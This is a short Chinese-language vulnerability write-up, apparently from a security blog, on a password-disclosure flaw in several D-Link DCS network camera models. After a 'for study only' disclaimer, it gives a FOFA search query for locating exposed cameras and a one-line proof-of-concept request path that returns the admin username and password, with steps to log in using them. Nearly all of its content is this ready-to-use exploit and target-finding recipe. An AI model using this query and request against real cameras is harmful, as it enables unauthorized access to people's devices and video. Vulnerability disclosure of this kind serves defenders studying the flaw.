0x01 前言

本次测试仅供学习使用，如若非法他用，与本文作者无关，需自行负责！！！

0x02 漏洞描述

D-link DCS是一款成像色彩为彩色 是一款网络摄像机。D-link DCS系统存在密码泄露漏洞，攻击者通过漏洞可以获取后台权限。

0x03 受影响版本

DCS-2530L

DCS-2670L

DCS-4603

DCS-4622等多个DCS系列系统

0x04 漏洞复现

fofa：app="D_Link-DCS-型号"

POC

/config/getuser?index=0

1.使用poc进行账号密码查看，得到密码登录即可

/config/getuser?index=0

2.得到的账号密码直接登录即可